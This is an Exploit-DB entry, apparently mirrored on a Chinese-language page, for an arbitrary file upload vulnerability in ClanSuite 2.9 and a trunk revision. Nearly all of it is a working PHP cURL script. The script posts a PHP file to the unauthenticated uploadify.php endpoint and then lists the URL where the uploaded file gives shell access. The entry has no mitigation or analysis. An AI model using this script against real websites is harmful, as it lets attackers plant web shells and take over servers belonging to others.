ClanSuite 2.9 – Arbitrary File Upload

  • 作者: Adrien Thierry
    日期: 2012-06-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19051/
  • ###########################################################
    #
    # Exploit Title: ClanSuite 2.9 Arbitrary File Upload
    # Date: 29/05/2012
    # Exploit Author: Adrien Thierry
    # Vendor Homepage:http://clansuite.com/
    # Software Link : https://github.com/jakoch/Clansuite
    # or			: http://svn.gna.org/svn/clansuite/trunk/
    # Version: 2.9 and Trunk Revision 6400
    #
    ###########################################################
    
    Vuln page : uploads/uploadify.php
    
    exploit :
    
    <?php
    $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
    $c = curl_init("http://mysite.com/uploads/uploadify.php"); // Version 2.9
    $c = curl_init("http://mysite.com/application/uploads/uploadify.php"); // Version trunk
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$u",
    'name'=>"info.php"));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    echo $e; 
    ?>
    
    shell access : http://mysite.com/uploads/temps/info.php
    or 			 : http://mysite.com/application/uploads/temps/info.php
    
    #####################################################################